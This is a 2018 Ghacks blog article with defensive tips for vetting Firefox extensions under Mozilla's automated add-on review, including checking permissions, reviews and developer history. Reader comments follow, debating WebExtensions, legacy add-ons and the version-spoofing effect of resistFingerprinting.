How to stay safe when downloading Firefox extensions

Martin Brinkmann
Jan 16, 2018
Firefox, Firefox add-ons
|
24

The following guide offers tips and instructions for staying safe when you download extensions for the Mozilla Firefox web browser.

The past year has been eventful for users of the Firefox web browser. Mozilla introduced features such as multi-process support or Firefox Quantum that moved the browser closer to the all-powerful Google Chrome browser.

Mozilla dropped the old add-on system of Firefox and replaced it with WebExtensions. WebExtensions is the same system that Google Chrome and other Chromium-based browsers support. Mozilla's plan was, however, to extend the capabilities of WebExtensions further than what Chrome supported.

Firefox WebExtensions have access to features that can make them more potent than their Chrome counterparts.

One of the reasons that Mozilla offered for switching to WebExtensions was that classic add-ons had too much control over the browser. WebExtensions limit what developers can do which benefits security and stability of the browser.

A look over to Chrome's Web Store for extensions shows, however, that WebExtensions may still be abused to spy on users, steal data, or abuse user devices in other ways.

Staying safe when downloading Firefox add-ons

mozillas addons website

AMO, Add-ons Mozilla Org, is the primary hub for Firefox extensions. It is the official extension directory, and users may use it to browse, search for and install browser extensions.

The store lists classic add-ons and WebExtensions currently. Mozilla announced plans in 2017 to remove traditional add-ons from the Store after Firefox ESR hits version 60. Firefox ESR is the only official Firefox version right now that supports legacy add-ons. The next version of the extended support release will end that.

Automatic and manual approval of extensions

firefox extensions reviews

Mozilla changed the extension submission system on Mozilla AMO. The organization verified each add-on manually in the past before allowing it to become available on AMO. The new system runs automated checks and adds any extension that passes these to the store.

This is the same system that Google users for Chrome extensions. Mozilla will check add-ons manually eventually but only after the fact. That's different to how Google handles things and improves security.

There is no manual verification indicator on the site right now which means that you don't know if an extension was reviewed manually.

Crypto-mining extensions slipped passed the automatic review process already, and while the situation is arguable a lot better than on Chrome's Web Store, there is a chance that problematic extensions may end up on AMO.

So, what can you do about it?

  • If you have the skills, verify extensions yourself. Download the extension to your local system, extract the XPI file, and go through the code.

If you cannot do that, you may use the following methods to reduce the chance of installing problematic extensions:

  • Don't install extensions directly when they are made available. You increase the likelihood that an extension was reviewed by Mozilla if you wait a couple of days.
  • Check the permissions. Do they match the purpose of the extension?
  • Read the user reviews and check general stats (rating, number of users, add-on history). Extensions with good ratings, lots of installs and good reviews are better than extensions with no reviews, no ratings, and no comments. This is not a 100% safeguard either. Hackers managed to take over Google accounts of Chrome developers in the past to upload manipulated new versions of trusted extensions to the Store.
  • Check the developer profile. Developers who maintain multiple extensions and maintained extensions for a long time are more trustworthy.

Closing Words

Don't get me wrong. I'm not advocating that Firefox users should not install add-ons anymore. Firefox users need to be aware of the dangers of the new review system. It is easy enough to see how bad things can become by looking at the situation over on Chrome's Web Store.  Mozilla's system is still better than Google's. The organization should consider adding a visible flag to extensions that have not been reviewed manually yet.

Now You: How do you handle this?

Summary
How to stay safe when downloading Firefox extensions
Article Name
How to stay safe when downloading Firefox extensions
Description
The following guide offers tips and instructions for staying safe when you download extensions for the Mozilla Firefox web browser.
Author
Publisher
Ghacks Technology News
Logo
Advertisement

Tutorials & Tips


Previous Post: «
Next Post: «

Comments

  1. Anonymous said on January 18, 2018 at 6:09 pm
    Reply

    So far the trend is:

    – 75% add-ons are manually reviewed within 5 days of submission
    – 5% add-ons are manually reviewed between 5 and 10 days of submission
    – The rest lags a bit (e.g. big updates or new add-ons that are pretty complex)

  2. Tau said on January 18, 2018 at 6:07 pm
    Reply

    Setting the mobile version as default (and its horrid design) says much about the trend. Automatic checks are absolutely a bad idea, the play store and the chrome repo are ridden with trashware and worse. Hopefully the human verification process won’t take too much time. When the last good sane ESR version goes out of support I’ll be an hassle to change browser.

  3. aaronfalls said on January 18, 2018 at 2:25 am
    Reply

    You can view the sources of addons from within Firefox by using https://addons.mozilla.org/en-US/firefox/addon/crxviewer/

    It has built in unpackers, js beautify, color highlighting so it’s my preferred choice to view source, the thing is you have to trust this addon developer which hard for the tin foil hats.

  4. Jozsef said on January 17, 2018 at 9:43 am
    Reply

    My short term solution is not to use any new extensions. The new policy of not doing manual checks shows that Mozilla’s management is completely illogical and irrational since it so completely contradicts their stated goal of protecting their users’ privacy and security as a very high priority. Either that or they really have a different set of goals that I can’t comprehend. It really seems like a rudderless ship which is so heartbreaking as I’ve used FF since it was separated from Mozilla Suite and called Phoenix.

    @dark Yes, open source is always reassuring once there has been a bit of time to check the code.

  5. dark said on January 16, 2018 at 7:33 pm
    Reply

    The first thing i do is google if the addon is open source or not, i don’t use closed source addons.

  6. Sophie said on January 16, 2018 at 7:31 pm
    Reply

    It does seem to me, to be absolutely mad that this process is now automated, giving rise to the possibility of the issues or problems that you describe, with regard to Addons.

    I thought that one of the fundamental reasons for these changes from Mozilla, was to make the environment safer, not less safe?

    Really this seems crazy to me, unless I’m missing something.

    1. John Fenderson said on January 16, 2018 at 8:47 pm
      Reply

      “I thought that one of the fundamental reasons for these changes from Mozilla, was to make the environment safer, not less safe?”

      Technically, the fundamental reason for the change was to free Mozilla devs to be able to make deep changes to the engine that would have been impossible while retaining backward compatibility.

      That said, they do, in fact, make extensions safer — because extensions have been neutered and simply don’t have the free access to the browser that they did with XUL. However, “safer” doesn’t mean “safe” in an absolute sense.

  7. Sophie said on January 16, 2018 at 7:24 pm
    Reply

    Sorry for my ignorance, but does anyone know if Waterfox will be continuing (somehow) legacy addons? Hosting them…and completely porting them to a new home?

    Will it be, do you think, that when ESR hits v60, [and if at that point traditional addons are removed]….will there be no other source to search for them and install them into legacy Firefox?

    I plan to keep legacy FF going for quite a while yet, while also using Quantum. Perhaps at some point I’ll make the leap, but like so many others, my old addons are still working nice, and do things that I can’t do in Quantum onwards.

    1. John Fenderson said on January 16, 2018 at 8:42 pm
      Reply

      “does anyone know if Waterfox will be continuing (somehow) legacy addons?”

      That’s their stated intentions, but who knows what the future will bring? Fortunately, AMO is not required to install extensions, it’s just a convenience.

  8. Ron said on January 16, 2018 at 5:40 pm
    Reply

    >>One of the reasons that Mozilla offered for switching to WebExtensions was that classic add-ons had too much control over the browser. <<

    Change "classic add-ons" to users, and that's what Mozilla really meant. That's why I won't ever use FF as my main browser anymore.

    Switch to either Pale Moon, Waterfox, or Basilisk is my advice.

  9. dani said on January 16, 2018 at 1:24 pm
    Reply

    The permission granularity is not very good. Even small operations requires the WebExtension to ask for very extensive permissions. So users who install a small add-on might wonder why such a simple add-on requires so many permission, not understanding that the add-on developer had no choice but to ask for them.

  10. Anonymous said on January 16, 2018 at 1:21 pm
    Reply

    If AMO thinks you’re using 52, then you likely have the “privacy.resistFingerprinting” pref set to true – that’s not Mozilla’s fault.

    The purpose of that setting is to make sure you’re browser doesn’t appear unique, and so it spoofs the version number of the current ESR version.

  11. SCBright said on January 16, 2018 at 1:15 pm
    Reply

    AMO is falling into the same garbage dump as the Chrome Store is…
    Rather than promoting continuous improvement, it is promoting the continuous worsening

  12. vosie said on January 16, 2018 at 1:14 pm
    Reply

    >>”Mozilla dropped the old add-on system of Firefox and replaced it with WebExtensions. WebExtensions is the same system that Google Chrome and other Chromium-based browsers support.”

    In other words Mozilla wanted to make Chrome addons usable in Firefox, in hope that it will increase Firefox’s market share. This wasn’t a bad idea. The bad idea was dropping support of old XUL / XPCOM addons. Mozilla should have to keep compatibility with both addons.

    >>”Firefox WebExtensions have access to features that can make them more potent than their Chrome counterparts.”

    This is the argument that Mozilla use to defend WebExtensions. But it’s a pathetic argument, because it doesn’t matter. The addon developers will not implement extra features in the Firefox version of their addons, because they want to keep consistency with the Chrome version. And WebExtensions is much worse and much more limited than classic (XUL/XPCOM) addons.

    >>”One of the reasons that Mozilla offered for switching to WebExtensions was that classic add-ons had too much control over the browser. WebExtensions limit what developers can do which benefits security and stability of the browser.”

    This proves how idiot Mozilla is. Classic addons are more powerful. That’s the exact reason why classic addons are much better than the junk WebExtensions! And they mandatorily used the “security and stability” marketing keywords as an argument to brainwash people so they justify/accept the removal of classic addons… Mozilla is pathetic.

    Firefox 57+ = Google Chrome Clone

    1. Paul's dad. said on January 17, 2018 at 1:05 pm
      Reply

      The murder of classic addons has been going on since Firefox 5.0, when the rapid release cycle was introduced. It was already a pain to keep add-ons updated before 5.0, since then, extension developers have been consistently driven off by Mozilla, and Firefox has consistently lost market share.

      The writing was on the wall since then, and now it’s come.
      I’ve been using Firefox since version 1.0, and now I’m using Vivaldi. If I’m gonna have crappy javascript-widgets-as-extensions, I might as well get the Chrome extensions while I’m at it, because there’s more choice and they’re better maintained. And Vivaldi gives me more customization than Firefox Quantum, and I’m frankly enjoying it quite a lot, despite its quirks.

      Nothing will ever be as good and stable as Firefox was with XUL extensions and single-process though. It’s just feasible.

    2. jan said on January 16, 2018 at 9:21 pm
      Reply

      I agree with vosie.
      It soon will be resolved when Firefox will go up in vapor

  13. Anonymous said on January 16, 2018 at 12:59 pm
    Reply

    On the Pale Moon’s add-ons page we have not that kind of dilemmas. All is safe there.

  14. pd said on January 16, 2018 at 12:16 pm
    Reply

    AMO thinks my browser is version 52. It’s actually 57.0.4

    It’s bad enough that they’ve butchered the addons system in 57+ but when poor volunteer add on devs re-write their code, if Mozilla can be bothered providing APIs, and make them available, yet the AMO store gets Firefox version detection wrong, geez.

    1. jan said on January 16, 2018 at 9:16 pm
      Reply

      Hi pd,

      I can understand your frustration; and I also think it is a very poor approach to throw the release version back to an earlier release when you disable something. It is a lousy programmers approach instead of doing it properly.
      Therefore, when you install 57 you got 57 I would say. If you disable something in 57 you still have 57. It is by coincidence that 57 minus “something” equals version 52

      In that context the unpolite remark made by Pants are not appropriate

      1. Anonymous said on January 19, 2018 at 1:22 am
        Reply

        You know nothing, John Snow, fingerprinting resistance is spoofing Firefox ESR, that’s why version 52 appears as expected. Your unpolite remark towards programmers is not appropriate.

    2. M said on January 16, 2018 at 12:56 pm
      Reply

      Check the resist.fingerprinting preference in about:config, it makes FF appears as 52. If you want to keep that enabled you can still download the xpi files and manually installing them

    3. Fx0 said on January 16, 2018 at 12:53 pm
      Reply

      The version detection on AMO works, but it depends on your user-agent, of course. If AMO thinks you’re using Firefox 52 then your user-agent tells AMO exactly that. One reason can be privacy.resistFingerprinting => true, this preference sets your user-agent to Firefox 52.

    4. Pants said on January 16, 2018 at 12:39 pm
      Reply

      This is because you have decided to go into about:config and change privacy.resistFingerprinting to true. There is no UI for this settings, and the default is false. Before you change things you should at least try to understand them, instead of throwing accusations. Mozilla have deliberately not exposed this as there are still a few issues.

      Here is a handy list of all the things RFP does and outstanding issues to with some of the patches, and things still to come: https://github.com/ghacksuserjs/ghacks-user.js/issues/7

  15. Appster said on January 16, 2018 at 10:59 am
    Reply

    This is the first thing to do, absolutely:

    Read the reviews of the extension you want to download! They are the most informative aspect in 99% of all cases.

Leave a Reply

Check the box to consent to your data being stored in line with the guidelines set out in our privacy policy

We love comments and welcome thoughtful and civilized discussion. Rudeness and personal attacks will not be tolerated. Please stay on-topic.
Please note that your comment may not appear immediately after you post it.